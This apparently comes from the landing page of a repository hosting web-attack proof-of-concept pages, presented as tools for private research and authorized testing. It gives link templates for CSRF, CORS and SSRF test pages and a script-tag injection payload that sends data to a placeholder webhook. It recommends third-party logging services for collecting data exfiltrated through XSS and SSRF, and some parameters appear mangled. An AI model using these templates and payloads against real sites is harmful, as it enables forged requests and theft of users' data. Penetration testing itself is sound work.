Private Research & Authorized Testing Tools
This URL is the base for all your PoC links. Replace `yourusername.github.io` with the domain from the code below.
[BASE_URL]csrf_attack.html?url=VULNERABLE_ACTION_URL¶m1=value1¶m2=value2...
[BASE_URL]cors_test.html?target=VULNERABLE_ENDPOINT_URL
[BASE_URL]ssrf_trigger.html?log=YOUR_WEBHOOK_URL
<script src="?log=YOUR_WEBHOOK_URL"></script>
Since this repository is static (GitHub Pages), data exfiltration PoCs (XSS, SSRF) require a third-party logging service. Use services like webhook.site or Beeceptor for your WEBHOOK_URL placeholder.